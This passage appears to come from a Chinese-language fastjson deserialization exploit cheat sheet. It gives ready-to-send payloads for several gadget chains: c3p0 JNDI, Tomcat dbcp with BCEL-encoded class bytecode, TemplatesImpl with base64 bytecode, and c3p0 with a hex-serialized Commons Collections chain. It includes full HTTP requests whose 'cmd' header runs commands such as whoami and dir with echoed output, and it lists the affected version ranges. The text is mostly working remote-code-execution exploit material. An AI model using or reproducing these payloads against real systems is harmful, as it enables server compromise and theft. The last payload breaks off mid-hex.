{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName", "loginTimeout":0}

bcel

可用于解决不出网利用。需要注意在Java 8u251以后，bcel类被删除。 tomcat7 org.apache.tomcat.dbcp.dbcp.BasicDataSource tomcat8及其以后 org.apache.tomcat.dbcp.dbcp2.BasicDataSource Poc

{
    {
        "x":{
                "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$..."
        }
    }: "x"
}

exp 执行命令回显.

POST /json HTTP/1.1
Host: 127.0.0.1:9092
Content-Type: application/json
cmd: whoami
Content-Length: 3327
{
    {
        "@type": "com.alibaba.fastjson.JSONObject",
        "x":{
                "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"
        }
    }: "x"
}

POST /json HTTP/1.1
Host: 127.0.0.1:9092
Content-Type: application/json
cmd: ver && echo fastjson
Content-Length: 3327
{
    {
        "@type": "com.alibaba.fastjson.JSONObject",
        "x":{
                "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$95W$Jx$Ug$Z$7e$t$bb$9b$99L$s$90$y$y$n$Jm9K$Sr$ARZ$S$K$84$40$m$92$84$98$NP$O$95$c9dH$W6$3bav$96$40$ab$b6JZ$5b$LZ$Lj9$d4$Kj$3c$f0$m$d1$r$82E$bc$82$d6$fb$3e$aax$l$f5$be$8b$8fJ$7d$ff$99$Nn$c8$96$3c$3e$cf$ce$7f$7e$ffw$be$df$f7$ff$fb$f4$b5$f3$X$B$y$c1U$V$c5x$m$H$ab$f1j$d1$bcF$c6A$V$7eo$a5_4$P$wxH$c5k$f1$b0$98$3c$a2$e0u$a2$7fT$c6$n$Vy8$ac$e2$f5x$83$ca$95$c7$c4$a97$8a$e6q1$3d$o$d8$kUQ$887$vx$b3$8c$b7$c8xB$cc$8e$c98$ae$a0I$c5$J$9c$U$8c$de$aa$a0C$c6$dbd$bc$5d$c5L$i$96$f1$a4$8a$d9$a2$7f$87$8a$b98$ac$e0$94$8a$d3x$a7$8a$e9x$97$82w$8b$7e$40$c1$7b$U$bcW$c1$fbd$bc_$c6$Z$V$l$c0$HE$f3$n$V$l$c6Y$V$d5$YT0$q$fa$8f$88$e6$a3$w$aa$90$U$cd9$d1$M$L5$3e$a6$e2$3c$$$88$e6$e3b$fa$94P$f9$a2$8cO$88$c9$ra$d3$te$7cJ$82$d4$zaJ$d3n$7d$9f$5e$9dp$o$d1$ea$f5z$bc$3bl$3a$b5$Sr$c2$91$ae$98$ee$qlS$c2$fc$f1$U$cb$bd$a5$a8$k$eb$aa$de$d8$b1$db4$9c$da$V$3c$95eD$r$U$a6$ed$d5G$f5x$bc$c9$d2$3bM$9b$db$be$ee$b8$z$a1$e0$c6$7do$a7$97$ad$d1$d3$v$n$98$b6$lv$ecH$ac$8b$E$92$3dv$p$r$94$h$3c$97$bd$3c$S$8b8$x$c8$a0$b4l$b3$E$7f$bd$d5I$b5$t7EbfK$a2$a7$c3$b4$db$f5$8e$a8$v$YX$86$k$dd$ac$db$R1O$zJ$fcf$df$a8R$8b$e54X$89X$e7$da$fd$86$d9$ebD$ac$Y$r$f9$9d$eeH$5c$c2$9c$a6x$a2$a7$c7$b4$e3$a6Qm$g$ddVu$bd$Vsl$x$g5$ed$ea$baht$z$97H$9c$XvtcO$b3$de$ebJ$a1$b3$J$u$ca$8aH$I$95$8e7$a3l$hu$b7$3avK$c8o6$9dn$ab$b3U$b7$f5$k$d3$a1$U$J$d32$ih$Uv$e6v$99N$9b$Z$ef$b5bq$daP$9cFe$9b$bb$a2$q$ab$f6$98Q$9dP$daf$baM$e9$867$d2$84$$$3dZg$Yf$3c$9eNT$99$81scl$l$7d$v$I$dau$9bz$a4$d3$cfJ$a3o$b1$c2$J$a3$db$d3$p$9d$s$d7$e8$d6$e9B$a7$85f$S7$bd$7d$d7u$8cX$d5$ad$M$ba$b3$c5$8e8$$j$qKB$a0$93$t$JV$a9$d1K$s$e6$RS$889$c7$a5$G$7e$7b$e9$f1N$d3$88$ea$b6$d9$d9$Q1$a3$84QQ$G$ad$dd$z$b2$M$c4$j$ddvx$$$e6f$ee$a7e$7c$86y$xAYnDSPR$c3V$c26$cc$86$88$c0$88$96$Kl$95$60$a9$e1$rh$d3$d0$82$8d$gZ$b1$91$80$k$97$k$g$ea$b1F$c3$3a$ac$970O$ec$ee$af$8a$9b$f6$be$a8$e9Tu$3bNo$d5z6ao$a1$cd$dc$9b0$e3$8e$8c$cfj$Y$c1e$N$8dx$b1$84$db$t$3a$e4E$5d$c3$GA$3ds$o$f4j$f8$i$dad$7c$5e$c3$d3$f8$82$868h$c4$X$f12$N_$S$cdKE$f3e$7cE$c3W$f15$a6$3e$c3$b9$de$U$v$cb$i$ba$813$Bzcrj$f8$3a$be1f$dd$c3$a8$8coj$f8$W$be$ad$a1$J$cd$y3$Z$A8F$f3$cc$f0$93$b0$e0$ff$A$9f$84$db$s$80$9e$E$d9$8aW$c5$88$3a$Z$df$d1$f0$5d$7cO$c3$f7$f1$MkH_$q$d6i$f5$J$bf$fc$80$c9$b8n$f5$G$c2dS$7bC$e5$5d$9eG$3c8$8e$da1$W$a4c$m$Q6$f4X$cc$b4e$fcP$c3$V$fcH$c3$8f$f1$T$Z$3f$d5$f03$fc$5c$40$e7$X$84$fb$8e$3a$N$bf$c4$af4$fc$g$cfhx$W$bf$d1$f0$5b$81$a9$df$89$e6$f7$f8$D$f1$a8$e1$8f$f8$93$86$3f$e3$_$g$fe$8a$bf$J$a8$e9$94$be$7d$7c$z$d0$f0w$R$bb$7f$e09$a6$de$84$b5$89$85b$fbM2$a3$f0$F$b6$98$9e$Z$ab$3a$9d$T$e5$m$F$8ey$a5$e3kwY$86r$3f$b9W8$cf$z$91$ed$b6n$98c$e0$d3$dem$T$7dLh$pa$dbf$cc$Z$9dO$zMg$e5$ad$92$97b$d0F$3d$S$a3x$9f$deI$3a$85$d1J$e93$a54$93$f4$fcH$bc$$$k$X$f7$hKs$83m$f5$I$de$e3$e8DM$W$81$f7$A$qaU$G$db$b6$8f$3fu$b3$w$3c$fd$85$f6$I$bf$I1$bd$87$8eX$96$a1$dag$IzY$a6$bb0$3d7$P$c4$j$b3$c7$bb$pZm$ab$d7$b4$9d$D$y$x$T$c4$e7$fau$9b$ebXMV$9fi$d7$eb$e2j$Z$eb$f9$ebD$rc$9c$c6z$k$W$b5$yf$98$ae$ef$K$fe$b7$d7$96$889$RQ$e7Uqc$8dNBc$b8$a6$96$c5$3dk$ee7$N$be$3a$s$d0$95V$89JQ$3bFRjQ$c2$qJj$8c$f5$s$I2$e2$84$8e$u$i$95$c6$d4M$db$e0$f1$f2$d2$8c$h$Z$a4$f3$ce$d5$Sqs$8d$Z$8d$f4xy$7f$T$r$d3$8b$81$b0$wf$ee$e7$8d$p$bb$c8$8f$c6nx$H$a4I$I$ec$8a$s$e2$bc$ea$CF$d4$S$ce$_$a0$rk$d2$af6Z7$a3$b4$ecfI$9c$c7$8b$d5$ab$a3$R$f7$89$e3$_$dd$s8$fb$c8$e9$G$M$dc$MM2$d3$c4$b6$f5$D$ee$b3$8a$B$cd$e3$f1p$82H2$bc$e4$K$89$3cc$ee$d1$ae1$F$a1h$7c$d2$a5$5e$80$98$c5gh1$9f$e52$UqCB$c2Z$ce$b2$d0$c09$_K$8e$Vq$ff$b9$fd$86T$cf$db$c3$edy$df$ba$7d$ab$db$Hx$96$d70$db0gI$f2$c8b$bf$bc$fc$i$qi$IY$fc$7c$X$e0$dfz$O$81$nd$PB$O$wI$e4$MA$V$c3$5cw$a8$N$40iZ$90$c4$a4aL$f6$N$p$ff$yyMC$F$l$d4y$f0$a1$9d$dc$aa$90$cbv2$9f$fc$F$94$h$84$86$v$a4$I$d1$KAWD$caB$y$e4$83$7d$JJP$8b$Z$d8D$eai$d4c$nOl$c6$W$f2$a3F$b8$H$5b$d9o$e3$97$8f$ac$e7yH$92$b1$5d4$3b$fcP$c5$dd$cb$Ta$97$o$cb$3dQ$5c$3e$82$bcAd$97$tQp$M$B$ff$Zo$i$dc$e2$3b$c3$5dO$b3$m$r$A$b7a$S$ffS$e4c$Ou$98$ebJ$d7$3c$Ox$b9$eb$p$n$d3$8f$acI$Sv$K$8fI$5c$GE$f2$o$f1Df$3d$82l$c1H$aa$y$c9_r$g$93$H$915$o$3c$e4$h$81$ffl$f90$a6$i$97B$5c$bb$8c$87$G$a1R$85$a9I$84$8e$e1$409$fd$cb$85$e04$ffS$u$dc$ea$LN$P$tQT$ceI1$t$r$9c$cc$b8$84$e9C$b8e$Q$b7$5c$86$w$a21$802$f2$n$83$e0$ad$3e$9e$nys$F$X8$$$s5C$c5P4$7b$84$8b$9b$x$92$985$80r$d1$cf$Z$c0l$d1$cf$h$401$d5$ba$8c$a9$83$d0$ae$x$oS$R$9f$abs$b7$absG$f0$f6a$ccO$a24X$96D$f91$u$c1$F$D$I$E$x$9ay$uX$99$SL$ca$94$d8K$a8j$a9$bc$80$ea$ad$c3XHU$93X$94$c4$e2$8asxQpI$Sw$q$b14$89$3b$x$93$b8$8b$df$b2$B$f8$9b$cf$96$97$f8w$ba8$J$a0$D$P$e0$m$fd$bf$I$P$e3Q$c6$40$f4G$f8$bfN$f4$t$Y$8b$Ri$a64$87$fb$5e$b4$k$e7$K0$9fQ$x$r$82$ca$Z$9f$F$a8$q$82$W$R$M$9b$88$96$ed$iu$e0$O$d8XJ$be$b5$e4$7c$t$fa$b1$8c$bc$ea$c9$fdn$i$c2$K$3c$c6$f1$R$ac$c4Q$ac$c2$T$i$9f$40$jN2$9b$9e$e4$f84$b3$u$c9$i$3a$cf$8c$Za$be$5ca$c6$5cE$8b4$9d$8f$d3$Zh$95f$oLm$da$a4$b9h$97$e6a$8bTAD$K$b4$ec$40$OeN$a2l$83$80$e8wQ$db$c9$d1$nwdrt$d4$j$ed$e2$e8$a4$3b$ea$e2$e8$K$a5vSB$We$94$o$82$dd$b4$92$Q$c2$k$Xsb$UE$Pq$u$d0W$8a$fc$m$fe$85$96$9d2b$fe$d52$acu2z$f9$ed$95$a7$cd$ac$93a$3f$87$b5$dc$Ba$u$Q$9a$93E$s$e0q$81$d2$f8$uJ$a5$7b$d8k$5c$eb$X$91$Xp$a8i$a9$bc$b8$d4$ef$5b$g$I$FB$feS0$xC$81$c55$d9E$d9$fe$qj$a5$g$b9H$a4$cbr$f6$b2$8b$94$bb$8fC$x$92K$86$b1b$A$d5E$f2$r$ac$e4$afF$vR$$$$$cd$f1$zUCj$u$e7$U$a6$V$v$nuqMnQ$ae$m$ecW$a5$81$e7$9f$rxj$94$fe$A$87$c7$vt$d5$d6$e6$cb$cf$3f$u$8a$c4$7cXt$dbhpW3$B$85$x$DL$e4$5b$99asi$ca$7c$ba$b4$9a$ae$ac$a1$T$eb$e94$83$O$8b$b0$b7h$abM$e78$a4$bd$X$7bq$lg$H9$T$c1XA$t$Y$fc$i$ba1$97$i$9a$5d$87$ca$e4$b9$Z$J$ec$e3$O$3d$80$3e$cf$c9$iyN$O$e0$7e$ecg$d8$b3$5cwWA$f97$C2$O$5cC$ae$8c$7b$r$e9$3fX$q$e3$3e$Z$af$b8$86$C$Z$x$r$e9$w$8a$Y$86$d8$3f$c1Q$60$d4$e9$7d$v$a7$xx$e5$f5$8a$3a$db$ad$q$M$E$abc$SuC$90$cf$8a$e0$ba$sg$bb$7b$K$dbW$b9$d5$fb$fe$ff$Ctz$ebem$R$A$A"
        }
    }: "x"
}

1.2.33 <= fastjson <= 1.2.47

POST /json HTTP/1.1
Host: 127.0.0.1:9092
Content-Type: application/json
cmd: whoami
Content-Length: 3647
{
    "xx":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"
            }
        } : "xxx"
    }
}

1.2.33<=fastjson<=12.36

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL..."
            }
        } : "ddd"
    }
}

1.2.37<=fastjson<=1.2.47

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "y": {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL$..",
                     "$ref": "$.x.y.c.connection"
            }
        }
    }
}

其他

{
  "@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
  "key": {
    "@type": "java.lang.Class",
    "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driverClassLoader": {
    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
  },
  "driver": "$$BCEL$$xxxxxxx"
}

TemplatesImpl

利用条件苛刻，可用于解决不出网利用。需要调用parseObject()方法时，加入Feature.SupportNonPublicField参数。 _bytecodes要进行base64编码

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQALVEVNUE9DLmphdmEMAAgACQcAIQwAIgAjAQASb3BlbiAtYSBDYWxjdWxhdG9yDAAkACUBAAZURU1QT0MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQALAAAADgADAAAACwAEAAwADQANAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAAEQABAA4AEAACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAAFgAMAAAABAABABEACQASABMAAgAKAAAAJQACAAIAAAAJuwAFWbcABkyxAAAAAQALAAAACgACAAAAGQAIABoADAAAAAQAAQAUAAEAFQAAAAIAFg=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

c3p0#WrapperConnectionPoolDataSource

可用于解决不出网利用。 fastjson <1.2.47 利用c3p0二次反序列化 cc payload到达回显。

POST /json HTTP/1.1
Host: 127.0.0.1:8999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
cmd: dir
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 8925
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6574